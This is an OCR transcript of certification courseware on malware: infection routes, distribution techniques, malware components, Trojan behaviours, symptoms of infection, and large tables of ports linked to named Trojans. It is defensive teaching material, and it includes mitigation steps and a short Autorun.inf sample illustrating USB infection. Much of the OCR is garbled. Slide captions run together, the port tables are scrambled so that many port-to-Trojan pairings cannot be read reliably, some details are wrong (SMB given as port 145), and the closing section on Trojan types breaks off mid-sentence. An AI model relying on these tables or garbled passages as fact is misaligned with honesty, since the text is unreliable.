Chapter 1 - 03 - Define Malware and its Types_fax_ocred.pdf

Full Transcript

Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Module Exam 212-82 Flow Define Threats Sources Define Threat Actors/ Agents Define Malware and its Types @ Define Vulnerabilities Understand Different Types of Vulnerabilities. All Rights Reserved. Reproduction ks Strictly Prohidited Define Malware and its Types To understand the various types of malware and their impact on network and system resources, we will begin with a discussion of the basic concepts of malware. This section describes malware, types of malware, and highlights the common techniques used by attackers to distribute malware on the web. Module 01 Page 19 Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Introduction to Malware O Malware is malicious software that damages or disables computer systems and gives limited or full control of the systems to the malware creator for the purpose of theft or fraud Malware programmers develop and use malware to: Attack browsers and track websites visited Slow down systems and degrade system performance Cause hardware failure, rendering computers inoperable Steal personal information, including contacts Copyright © by EC-C L All Rights Reserved. Reproduction is Strictly Prohibited Introduction to Malware Malware is malicious software that damages or disables computer systems and gives limited or full control of the systems to the malware creator for malicious activities such as theft or fraud. Malware includes viruses, worms, Trojans, rootkits, backdoors, botnets, ransomware, spyware, adware, scareware, crapware, roughware, crypters, keyloggers, etc. This malicious software may delete files, slow down computers, steal personal information, send spam, or commit fraud. Malware can perform various malicious activities ranging from simple email advertising to complex identity theft and password stealing. Malware programmers develop and use malware to: = Attack browsers and track websites visited = Slow down systems and degrade system performance = Cause hardware failure, rendering computers inoperable = Steal personal information, including contacts = Erase valuable information, resulting in substantial data loss = Attack additional computer systems directly from a compromised system »= Spam inboxes with advertising emails Module 01 Page 20 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Different Ways for Malware to Enter a System o Q b~ 8 L Downloading files from the ¢. Instant Messenger applications ‘ St aras m. Portable hardware media/removable devices. (3) Browserand email software bugs () Installation by other malware. Untrusted sites and freeware web applications/ software. Bluetooth and wireless networks Email attachments \V, Copyright © bty EC-Councll. All Rights Reserved. Reproduction ks Strictly Prohibited. Different Ways for Malware to Enter a System * Instant Messenger Applications Infection can occur via instant messenger applications such as Facebook Messenger, WhatsApp Messenger, LinkedIn Messenger, Google Hangouts, or ICQ. Users are at high risk while receiving files via instant messengers. Regardless of who sends the file or from where it is sent, there is always a risk of infection by a Trojan. The user can never be 100% sure of who is at the other end of the connection at any particular moment. For example, if you receive a file through an instant messenger application from a known person such as Bob, you will try to open and view the file. This could be a trick whereby an attacker who has hacked Bob's messenger ID and password wants to spread Trojans across Bob's contacts list to trap more victims. * Portable Hardware Media/Removable Devices o Portable hardware media such as USB drives, DVDs, and external hard drives can also inject malware into a system. A simple way of injecting malware into the target system is through physical access. For example, if Bob can access Alice’s system in her absence, then he can install a Trojan by copying the Trojan software from his flash drive onto her hard drive. o Another means of portable media malware infection is through the Autorun function. Autorun, also referred to as Autoplay or Autostart, is a Windows feature that, if enabled, runs an executable program when a user inserts a DVD in the DVDROM tray or connects a USB device. Attackers can exploit this feature to run malware along with genuine programs. They place an Autorun.inf file with the malware in a DVD or USB device and trick people into inserting or plugging it into Module 01 Page 21 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 their systems. Because many people are not aware of the risks involved, their machines are vulnerable to Autorun malware. The following is the content of an Autorun.inf file: [autorun] open=setup.exe icon=setup. exe To mitigate such infection, turn off the Autostart instructions below to turn off Autoplay in Windows 10: functionality. Follow the 1. Click Start. Type gpedit.msc in the Start Search box, and then press ENTER. 2. If you are prompted for an administrator password or confirmation, type the password, or click Allow. 3. Under Computer Configuration, expand Administrative Windows Components, and then click Autoplay Policies. Templates, expand 4. Inthe Details pane, double-click Turn off Autoplay. 5. Click Enabled, and then select All drives in the Turn off Autoplay box to disable Autorun on all drives. 6. Restart the computer. Browser and Email Software Bugs Outdated web browsers often contain vulnerabilities that can pose a major risk to the user’s computer. A visit to a malicious site from such browsers can automatically infect the machine without downloading or executing any program. The same scenario occurs while checking e-mail with Outlook Express or some other software with well-known problems. Again, it may infect the user's system without even downloading an attachment. To reduce such risks, always use the latest version of the browser and email software. Insecure Patch management Unpatched software poses a high risk. Users and IT administrators do not update their application software as often as they should, and many attackers take advantage of this well-known fact. Attackers can exploit insecure patch management by injecting the software with malware that can damage the data stored on the company’s systems. This process can lead to extensive security breaches, such as stealing of confidential files and company credentials. Some applications that were found to be vulnerable and were patched recently include Google Play Core Library (CVE-2020-8913), Cloudflare WARP for Windows (CVE-2020-35152), Oracle WebLogic Server (CVE-2020-14750), and Apache Tomcat (CVE-2021-24122). Patch management must be effective in mitigating threats, and it is vital to apply patches and regularly update software programs. Module 01 Page 22 Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Rogue/Decoy Applications Attackers can easily lure a victim into downloading free applications/programs. If a free program claims to be loaded with features such as an address book, access to several POP3 accounts, and other functions, many users will be tempted to try it. POP3 (Post Office Protocol version 3) is an email transfer protocol. o If a victim downloads free programs and labels them as TRUSTED, protection software such as antivirus software will fail to indicate the use of new software. In this situation, an attacker receives an email, POP3 account passwords, cached passwords, and keystrokes through email without being noticed. Attackers thrive on creativity. Consider an example in which an attacker creates a fake website (say, Audio galaxy) for downloading MP3s. He or she could generate such a site using 15 GB of space for the MP3s and installing any other systems needed to create the illusion of a website. This can fool users into thinking that they are merely downloading from other network users. However, the software could act as a backdoor and infect thousands of naive users. Some websites even link to anti-Trojan software, thereby fooling users into trusting them and downloading infected freeware. Included in the setup is a readme.txt file that can deceive almost any user. Therefore, any freeware site requires proper attention before any software is downloaded from it. Webmasters of well-known security portals, who have access to vast archives containing various hacking programs, should act responsibly with regard to the files they provide and scan them often with antivirus and anti-Trojan software to guarantee that their site is free of Trojans and viruses. Suppose that an attacker submits a program infected with a Trojan (e.g., a UDP flooder) to an archive’s webmaster. If the webmaster is not alert, the attacker may use this opportunity to infect the files on the site with the Trojan. Users who deal with any software or web application should scan their systems daily. If they detect any new file, it is essential to examine it. If any suspicion arises regarding the file, it is also important to forward it to software detection labs for further analysis. o It is easy to infect machines using freeware; thus, extra precautions are necessary. Untrusted Sites and Freeware Web Applications/Software A website could be suspicious if it is located at a free website provider or one offering programs for illegal activities. o It is highly risky to download programs or tools located on “underground” sites, e.g., NeuroticKat software, because they can serve as a conduit for a Trojan attack on target computers. Users must assess the high risk of visiting such sites before browsing them. Many malicious websites have a professional look, massive archives, feedback forums, and links to other popular sites. Users should scan the files using antivirus Module 01 Page 23 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 software before downloading them. Just because a website looks professional does not mean that it is safe. o Always download popular software from its original (or officially dedicated mirror) site, and not from third-party sites with links to the (supposedly) same software. Downloading Files from the Internet Trojans enter a system when users download Internet-driven applications such as music players, files, movies, games, greeting cards, and screensavers from malicious websites, thinking that they are legitimate. Microsoft Word and Excel macros are also used effectively to transfer malware and downloaded malicious MS Word/Excel files can infect systems. Malware can also be embedded in audio/video files as well as in video subtitle files. Email Attachments An attachment to an e-mail is the most common medium to transmit malware. The attachment can be in any form, and the attacker uses innovative ideas to trick the victim into clicking and downloading the attachment. The attachment may be a document, audio file, video file, brochure, invoice, lottery offer letter, job offer letter, loan approval letter, admission form, contract approval, etc. Example 1: A user’s friend is conducting some research, and the user would like to know more about the friend’s research topic. The user sends an e-mail to the friend to inquire about the topic and waits for a reply. An attacker targeting the user also knows the friend’s e-mail address. The attacker will merely code a program to falsely populate the e-mail “From:” field and attach a Trojan in the email. The user will check the email and think that the friend has answered the query in an attachment, download the attachment, and run it without thinking it might be a Trojan, resulting in an infection. Some email clients, such as Outlook Express, have bugs that automatically execute attached files. To avoid such attacks, use secure email services, investigate the headers of emails with attachments, confirm the sender’s email address, and download the attachment only if the sender is legitimate. Network Propagation Network security is the first line of defense for protecting information systems from hacking incidents. However, various factors such as the replacement of network firewalls and mistakes of operators may sometimes allow unfiltered Internet traffic into private networks. Malware operators continuously attempt connections to addresses within the Internet address range owned by targets to seek an opportunity for unfettered access. Some malware propagates through technological networks. For example, the Blaster starts from a local machine’s IP address or a completely random address and attempts to infect sequential IP addresses. Although network propagation attacks that take advantage of vulnerabilities in common network protocols (e.g., SQL Slammer) have not been prevalent recently, the potential for such attacks still exists. Module 01 Page 24 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 File Sharing Services If NetBIOS (Port 139), FTP (Port 21), SMB (Port 145), etc., on a system are open for file sharing or remote execution, they can be used by others to access the system. This can allow attackers to install malware and modify system files. Attackers can also use a DoS attack to shut down the system and force a reboot so that the Trojan can restart itself immediately. To prevent such attacks, ensure that the file sharing property is disabled. To disable the file sharing option in Windows, click Start and type Control Panel. Then, in the results, click on the Control Panel option and navigate to Network and Internet > Network and Sharing Center - Change Advanced Sharing Settings. Select a network profile and under File and Printer Sharing section, select Turn off file and printer sharing. This will prevent file sharing abuse. Installation by other Malware A piece of malware that can command and control will often be able to re-connect to the malware operator’s site using common browsing protocols. This functionality allows malware on the internal network to receive both software and commands from the outside. In such cases, the malware installed on one system drives the installation of other malware on the network, thereby causing damage to the network. Bluetooth and Wireless Networks Attackers use open Bluetooth and Wi-Fi networks to attract users to connect to them. These open networks have software and hardware devices installed at the router level to capture the network traffic and data packets as well as to find the account details of the users, including usernames and passwords. Module 01 Page 25 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Common Exam 212-82 Techniques Attackers Use to Distribute Malware on the Web ‘ ; ’ Black hat Search Engine op ation (SEO) | Secial Engincesed | Tricking usersinto clicking on innocent-looking webpages Spear-phishing Sites | Mimicking legitimate institutions in an attempt to steallogin credentials I of legitimate, high-trafficsites |. e Hosting embedded malware that spreadsto unsuspecting visitors Click-jacking - 1 stising Compromised Legitimate Websites Drive-by Downloads Spem Emelle Ranking malware pages highly in search results ’ Embedding malwarein ad-networks that displayacross hundreds | Exploiting flaws in browser software to install My visiting a web page | Attaching the malwareto emails and tricking victims to click the attachment Copyright © by EC- malware ’ just by ’ 1. All Rights Reserved. Reproduction i Strictly Prohibited Common Techniques Attackers Use to Distribute Malware on the Web Source: Security Threat Report (https://www.sophos.com) Some standard techniques used to distribute malware on the web are as follows: = Black hat Search Engine Optimization (SEO): Black hat SEO (also referred to as unethical SEOQ) uses aggressive SEO tactics such as keyword stuffing, inserting doorway pages, page swapping, and adding unrelated keywords to get higher search engine rankings for malware pages. ® Social Engineered Click-jacking: Attackers inject malware into websites that appear legitimate to trick users into clicking them. When clicked, the malware embedded in the link executes without the knowledge or consent of the user. = Spear-phishing Sites: This technique is used for mimicking legitimate institutions, such as banks, to steal passwords, information. credit card and bank account data, and other sensitive ® Malvertising: This technique involves embedding malware-laden advertisements in legitimate online advertising channels to spread malware on systems of unsuspecting users. = Compromised Legitimate Websites: Often, attackers use compromised websites to infect systems with malware. When an unsuspecting user visits the compromised website, he/she unknowingly installs the malware on his/her system, after which the malware performs malicious activities. Module 01 Page 26 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 = Drive-by Downloads: This refers to the unintentional downloading of software via the Internet. Here, an attacker exploits flaws in browser software to install malware by merely visiting a website. *= Spam Emails: The attacker attaches a malicious file to an email and sends the email to multiple target addresses. The victim is tricked into clicking the attachment and thus executes the malware, thereby compromising his/her machine. This technique is the most common method currently in use by attackers. In addition to email attachments, an attacker may also use the email body to embed the malware. Module 01 Page 27 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Components of Malware QO The componentsof a malware software depend on the requirements of the malware author who designs it for a specific target to perform intended tasks Crypter Downloader Dropper Exploit Injector i O i Software that protects malware from undergoing reverse engineering or analysis A type of Trojan that downloads other malware from the Internet on to the PC A type of Trojan that covertly installs other malware files on to the system A malicious code that breaches the system security via software vulnerabilities install malware to access information or A program that injects its code into other vulnerable running processes and changes how they execute to hide or prevent its removal A program that conceals its code and intended security mechanisms to detect or remove it purpose via various techniques, and thus, makes it hard for A program that allows all files to bundle together into a single executable file via compression to bypass security software detection Payload Malicious Code A piece of software that allows control over a computer system after it has been exploited A command that defines malware’s basic functionalities such as stealing data and creating backdoors il All Rights Reserved. Reproduction is Strictly Prohibited Components of Malware Malware authors and attackers create malware using components that can help them achieve their goals. They can use malware to steal information, delete data, change system settings, provide access, or merely multiply and occupy space. Malware is capable of propagating and functioning secretly. Some essential components of most malware programs are as follows: = Crypter: It is a software program that can conceal the existence of malware. Attackers use this software to elude antivirus detection. It protects malware from reverse engineering or analysis, thus making it difficult to detect by security mechanisms. * Downloader: It is a type of Trojan that downloads other malware (or) malicious code and files from the Internet to a PC or device. Usually, attackers install a downloader when they first gain access to a system. = Dropper: It is a covert carrier of malware. Attackers embed notorious malware files inside droppers, which can perform the installation task covertly. Attackers need to first install the malware program or code on the system to execute the dropper. The dropper can transport malware code and execute malware on a target system without being detected by antivirus scanners. = Exploit: It is the part of the malware that contains code or a sequence of commands that can take advantage of a bug or vulnerability in a digital system or device. Attackers use such code to breach the system’s security through software vulnerabilities to spy on information or to install malware. Based on the type of vulnerabilities abused, exploits are categorized into local exploits and remote exploits. Module 01 Page 28 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities = Exam 212-82 |njector: This program injects exploits or malicious code available in the malware into other vulnerable running processes and changes the method of execution to hide or prevent its removal. = Obfuscator: It is a program that conceals the malicious code of malware via various techniques, thus making it difficult for security mechanisms to detect or remove it. = Packer: This software compresses the malware file to convert the code and data of the malware into malware. = an unreadable format. It uses compression techniques to pack the Payload: It is the part of the malware that performs the desired activity when activated. It may be used for deleting or modifying files, degrading the system performance, opening ports, changing settings, etc., to compromise system security. *= Malicious Code: This is a piece of code that defines the basic functionality of the malware and comprises commands that result in security breaches. It can take the following forms: o Java Applets o ActiveX Controls o Browser Plug-ins o Pushed Content Module 01 Page 29 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Types of Malware Bl mojans B russorGrayware B viruses B soyware B rensomware B xeylogger Bl computerWorms Bl sotnets B rootxits B0 Fiteless Maiware Copyright © by E I. All Rights Reserved. Reproduction is Strictly Prohibited. Types of Malware A malware is a piece of malicious software that is designed to perform activities intended by the attacker without user consent. It may be in the form of executable code, active content, scripts, or other kinds of software. Listed below are various types of malware: Trojans Viruses Ransomware Computer Worms Rootkits PUAs or Grayware Spyware Keylogger Botnets Fileless Malware Module 01 Page 30 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 What is a Trojan? It is a program in which the ' or is contained inside an apparently harmless program or data, which can later gain control and cause damage ©) Trojans get activated whena ' ‘ Trojans between the victim computer and the attacker for transferring sensitive data Change? | Destroy?......................................... Internet Malicious Files Downloads Malicious Files ! @ Victim infected with Trojan 1. All Rights Reserved. Reproduction is Strictly Prohibited Trojans What is a Trojan? According to ancient Greek mythology, the Greeks won the Trojan War with the aid of a giant wooden horse that was built to hide their soldiers. The Greeks left this horse in front of the gates of Troy. The Trojans thought that the horse was a gift from the Greeks, which they had left before apparently withdrawing from the war and brought it into their city. At night, the Greek soldiers broke out of the wooden horse and opened the city gates to let in the rest of the Greek army, who eventually destroyed the city of Troy. Inspired by this story, a computer Trojan is a program in which malicious or harmful code is contained inside an apparently harmless program or data, which can later gain control and cause damage, such as ruining the file allocation table on your hard disk. Attackers use computer Trojans to trick the victim into performing a predefined action. Trojans are activated upon users’ specific predefined actions such as unintentionally installing a malicious software, clicking on a malicious link, etc., and upon activation, they can grant attackers unrestricted access to all the data stored on the compromised information system and potentially cause severe damage. For example, users could download a file that appears to be a movie, but, when executed, unleashes a dangerous program that erases the hard drive or sends credit card numbers and passwords to the attacker. A Trojan is wrapped within or attached to a legitimate program, meaning that the program may have functionality that is not apparent to the user. Furthermore, attackers use victims as unwitting intermediaries to attack others. They can use a victim’s computer to commit illegal DoS attacks. Module 01 Page 31 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Trojans work at the same level of privileges as the victims. For example, if a victim has privileges to delete files, transmit information, modify existing files, and install other programs (such as programs that provide unauthorized network access and execute privilege elevation attacks), once the Trojan infects that system, it will possess the same privileges. Furthermore, it can attempt to exploit vulnerabilities to increase the level of access even beyond the user running it. If successful, the Trojan can use such increased privileges to install other malicious code on the victim’s machine. A compromised system can affect other systems on the network. Systems that transmit authentication credentials such as passwords over shared networks in clear text or a trivially encrypted form are particularly vulnerable. If an intruder compromises a system on such a network, he or she may be able to record usernames and passwords or other sensitive information. Additionally, a Trojan, depending on the actions it performs, may falsely implicate a remote system as the source of an attack by spoofing, thereby causing the remote system to incur a liability. Trojans enter the system by means such as email attachments, downloads, and instant messages. Change? ----------------------------------------- Downloads Malicious Attacker Files Internet propagates Trojan Malicious Files Victim infected with Trojan Figure 1.2: Depiction of a Trojan attack Module 01 Page 32 Certified Cybersecurity Technician Copyright © by EC-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 links, fli o :iz-':?\::r::seie:v:r:;?so Itisat The color settings of the operating P ’ everything is displayed backward @ e The default background or wallpaper settings change 23 ® r 7 B { automatically system (OS) change automatically v Web pages suddenly open without input from the user @ Antivirus programs are automatically disabled —_ @ ] e Pop-ups with bizarre messages suddenly appear L. All Rights Reserved. Reproduction i Kl Th ID: Indications of Trojan Attack Strictly Prohibited Indications of Trojan Attack The following computer malfunctions are indications of a Trojan attack: The DVD-ROM drawer opens and closes automatically. The computer screen displayed backward. blinks, flips upside-down, or is inverted so that everything The default background or wallpaper settings change automatically. This can performed using pictures either on the user’s computer or in the attacker’s program. is be Printers automatically start printing documents. Web pages suddenly open without input from the user. The color settings of the operating system (OS) change automatically. Screensavers convert to a personal scrolling message. The sound volume suddenly fluctuates. Antivirus programs are automatically disabled, and the data are corrupted, altered, or deleted from the system. The date and time of the computer change. The mouse cursor moves by itself. The left- and right-click functions of the mouse are interchanged. The mouse pointer disappears completely. The mouse pointer automatically clicks on icons and is uncontrollable. Module 01 Page 33 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Exam 212-82 Information Security Threats and Vulnerabilities = The Windows Start button disappears. = Pop-ups with bizarre messages suddenly appear. = (lipboard images and text appear to be manipulated. = The keyboard and mouse freeze. = Contacts receive emails from a user’s email address that the user did not send. = Strange warnings or question boxes appear. Often, these are personal messages directed at the user, asking questions that require him/her to answer by clicking a Yes, No, or OK button. * The system turns off and restarts in unusual ways. = The taskbar disappears automatically. = The Task Manager is disabled. The attacker or Trojan may disable the Task Manager function so that the victim cannot view the task list or end the task on a given program or process. Module 01 Page 34 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 How Hackers Use Trojans Delete or replace critical A~ d antivirus Record screenshots, audio, and video of victim’s PC @ Create backdoors to gain remote access operating system files Steal personal information such Use victim’s PC for spamming as passwords, security codes, and credit card information and blasting email messages Download spyware, adware, and malicious files Disable firewalls and @ Encrypt the data and lock out the victim from accessing the machine How Hackers Use Trojans Attackers create malicious programs such as Trojans for the following purposes: Delete or replace OS’s critical files Generate fake traffic to perform DoS attacks Record screenshots, audio, and video of victim’s PC Use victim’s PC for spamming and blasting email messages Download spyware, adware, and malicious files Disable firewalls and antivirus Create backdoors to gain remote access Infect the victim’s PC as a proxy server for relaying attacks Use the victim’s PC as a botnet to perform DDoS attacks Steal sensitive information such as: o Credit card information, which shopping using keyloggers o Account data passwords o Important company projects, including presentations and work-related papers such as email is useful passwords, for domain dial-up registration passwords, and as well as for web service Encrypt the victim’s machine and prevent the victim from accessing the machine Module 01 Page 35 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities = = Exam 212-82 Use the target system as follows: o To store archives of illegal materials, such as child pornography. The target continues using his/her system without realizing that attackers are using it for illegal activities o Asan FTP server for pirated software Script kiddies may just want to have fun with the target system; an attacker could plant a Trojan in the system just to make the system act strangely (e.g., the DVD tray opens and closes frequently, the mouse functions improperly, etc.) * The attacker might use a compromised system for other illegal purposes such that the target would be held responsible if these illegal activities are discovered by the authorities Module 01 Page 36 Certified Cybersecurity Technician Copyright © by EC-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Common Ports used by Trojans Port Trojan 20/22/80/443 Port | Emotet Trojan SpySender 8080 1863 XtremeRAT 8787 / 54321 Blade Runner, DarkFTP 22 SSH RAT, Linux Rabbit 23 EliteWrap 68 Mspy 80 Ismdoor, Poison Ivy, POWERSTATS 6666 443 Cardinal RAT, ghOst RAT, TrickBot 6667/12349 445 WannaCry, 1177 njRAT 1604 DarkComet 2140/3150/6670-71 | BackOfrice 2000 Delf SpyGate RAT, Punisher RAT 10100 Gift Blade Runner 11000 Senna Spy KilerRat, Houdini RAT 11223 Progenic Trojan Bionet, Magic Hound 12223 Hack 99 KeyLogger 6969 GateCrasher, Priority 23456 Evil FTP, Ugly FTP 7000 Remote Grab 7789 ICKiller 5400-02 | Deep Throat Zeus, Shamoon 10048 5000 RAT, Pandora RAT Trojan 1807 21 Petya Port 31337-38 65000 gii:%gfi‘e[ e Devil Bvevcvaviianzas iz W2 *Noe vy g Copyright © by EC-Councll.All Rights Reserved. Reproduction ks Strictly Prohibited. Common Ports used by Trojans Ports represent the entry and exit points of data traffic. There are two types of ports: hardware ports and software ports. Ports within the OS are software ports, and they are usually entry and exit points for application traffic (e.g., port 25 is associated with SMTP for e-mail routing between mail servers). Many existing ports are application-specific or process-specific. Various Trojans use some of these ports to infect target systems. Users need a basic understanding of the state of an "active connection” and ports commonly used by Trojans to determine whether a system has been compromised. Among the various states, the “listening” state is the important one in this context. The system generates this state when it listens for a port number while waiting to connect to another system. Whenever a system reboots, Trojans move to the listening state; some use more than one port: one for "listening" and the other(s) for data transfer. Common ports used by different Trojans are listed in the table below. Port 2 20/22/80/ 443 21/3024/ 4092/5742 21 Module 01 Page 37 Trojan Death Emotet. WinCrash Bla.dc.e Runner, Doly Troyc.m, Fore, Invisible FTP, WebEx, WinCrash, Port 5001/50505 5321 >400-02 5569 Trojan | Sockets de Troie FireHotcker Blade Runner/Blade Runner 0.80 Alpha Robo-Hack Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 DarkFTP 22 Shaft, SSH RAT, Linux Rabbit 6267 GW Girl 23 Tiny Telnet Server, EliteWrap 6400 Thing 25 Antigen, Email Password Sender, Terminator, WinPC, WinSpy, Haebu Coceda, Shtrilitz Stealth, Terminator, 6666 KilerRat, Houdini RAT 6667/12349 Bionet, Magic Hound Kuang2 0.17A-0.30, Jesrto, Lazarus Group, Mis-Type, Night Dragon 26 31/456 BadPatch Hackers Paradise 6670-71 DeepThroat Denis, Ebury, FIN7, Lazarus Group, 53 RedLeaves, Threat Group-3390, Tropic 6969 GateCrasher, Priority 7000 Remote Grab Trooper 68 Mspy Necurs, NetWire, Ismdoor, Poison lvy, Executer, Codered, APT 18, APT 19, APT 80 32, BBSRAT, Calisto, Carbanak, Carbon, Comnie, Empire, FIN7, InvisiMole, Lazarus Group, MirageFox, Mis-Type, 7300-08 NetMonitor Misdat, Mivast, MoonWind, Night Dragon, POWERSTATS, RedLeaves, SType, Threat Group-3390, UBoatRAT 7300/31338 /31339 113 Shiver 139 Nuker, Dragonfly 2.0 7597 Qaz 421 TCP Wrappers Trojan 7626 Gdoor 7777 GodMsg 443 ADVSTORESHELL , APT 29, APT 3, APT 33, AuditCred, BADCALL, BBSRAT, Bisonal, Briba, Carbanak, Cardinal RAT, Comnie, Derusbi, ELMER, Empire, FELIXROOT, FIN7, FIN8 , ghOst RAT, HARDRAIN, Hi-Zor, HOPLIGHT, Net Spy KEYMARBLE, Lazarus Group, LOWBALL, Mis-Type, Misdat, MoonWind, Naid, Nidiran, Pasam, PlugX, PowerDuke, POWERTON, Proxysvc, RATANKBA, RedLeaves, S-Type, TEMP.Veles , Threat Module 01 Page 38 Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Group-3390, TrickBot, Tropic Trooper, TYPEFRAME, UBoatRAT 445 WannaCry, Petya, Dragonfly 2.0 7789 456 Hackers Paradise 8000 555 Ini-Killer, Phase Zero, Stealth Spy 8012 ICKiller BADCALL, C Volgmer ie, RESES Ptakks Zeus, APT 37, Comnie, EvilGrab, FELIXROOT, FIN7, HTTPBrowser, 666 Satanz Backdoor, Ripper 8080 Lazarus Group, Magic Hound, OceanSalt, SType, Shamoon, TYPEFRAME, Volgmer 1001 3 Silencer, WebEx 1011 Doly Trojan 1026/ 8443 8787/54321 | FELIXROOT, Nidiran, TYPEERAME BackOfrice 2000 | pom 9989 iNi-Killer RAT 10048 Delf 1170 Psyber Stream Server, Voice 10100 Gift 1177 njRAT 10607 1234 Ultors Trojan 11000 Valvo line 11223 Progenic Trojan SubSeven 1.0-1.8 12223 Hack’99 KeyLogger 12345-46 GabanBus, NetBus 64666 1095-98 1234/ 12345 1243 Coma 1.0.9 Senna Spy € $ 1243/6711 /6776/273 | Sub Seven 74 1245 VooDoo Doll 1777 Java RAT, Agent.BTZ/ComRat, Adwind 12361, 12362 Whack-a-mole 16969 Priority 20001 Millennium RAT 1349 Module 01 Page 39 Back Office DLL Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 1492 | FTP9ICMP 1433 Misdat 21544 GirlFriend 1.0, Beta-1.35 1600 Shivka-Burka 2323232323/ Prosiak 1604 FliAa\rTkComet RAT, Pandora RAT, HellSpy 29222 RuX 1807 SpySender 23432 Asylum 1863 XtremeRAT 23456 Evil FTP, Ugly FTP 1981 Shockrave 25685 Moon Pie 1999 BackDoor 1.00-1.03 26274 Delta 2001 Trojan Cow 30100-02 NetSphere 1.27a 2115 - 31337-38 Back Orifice/ Back Orifice 1.20 /Deep BO 2140 The Invasor 31338 DeepBO DeepThroat 31339 NetSpy DK 2155 Illusion Mailer, Nirvana 31666 BOWhack 2801 Phineas Phucker 34324 BigGluck, TN 3129 Masters Paradise 40412 The Spy 3131 SubSari 3150 The Invasor 47262 Delta 3389 RDP 50766 Fore Portal of Doom 53001 ;? Lrjr;z:iv\nNindows RA 54321 SchoolBus.69-1.11 / 2140/3150 39783(;//91%226— | 20034/1120 | S0 ;:g'lBEta' 40421-26 Masters Paradise 7/10167 4000 Module 01 Page 40 Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 4567 File Nail 1 61466 Telecommando 4590 ICQTrojan 65000 Devil 5000 Bubbel, SpyGate RAT, Punisher RAT Table 1.1: Trojans and corresponding port of attack Module 01 Page 41 Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. SRR AYOEISECUrity Technician Information Security Threats and Vulnerabilities Exam 212-82 Types of Trojans Remote Access Trojans 2 Backdoor Trojans 3 Botnet Trojans 4 Rootkit Trojans 5 E-Banking Trojans 6 Service Protocol Trojans Mobile Trojans loT Trojans Security Software Disabler Trojans Destructive Trojans Point-of-Sale Trojans DDoS Attack Trojans Defacement Trojans Command Copyright 3. © by EC- computer, such as transf erring, modifying, or cor rupting software, and rebooting the machine, without user detect ion. Botnet Trojans: Today, most ‘ MCH. files, Shell Trojans All Rights Reserved. Reproduction installing is Strictly Prohibited. malicious major information security attacks involve botnets. Attackers (also known as “bot herders”) use botnet Tro jans to infect a large number of Module 01 Page 42 Certified Cybersecurity Tech nician Copyright © by EC-C ouncil All Rights Reserved. Reproduction ic Strir Certified Cybersecurity Technician Information Security Threats and Vulnerabilities 4. Exam 212-82 Rootkit Trojans: As the name indicates, “rootkit” consists of two terms, i.e., “root” and “kit.” “Root” is a UNIX/Linux term that is the equivalent of “administrator” in Windows. The word access to backdoors detected control of “kit” denotes programs that allow someone to obtain root-/admin-level the computer by executing the programs in the kit. Rootkits are potent that specifically attack the root or OS. Unlike backdoors, rootkits cannot be by observing services, system task lists, or registries. Rootkits provide full the victim OS to the attacker. E-Banking Trojans: E-banking Trojans are extremely dangerous and have emerged as a significant threat to online banking. They intercept the victim's account information before the system can encrypt it and 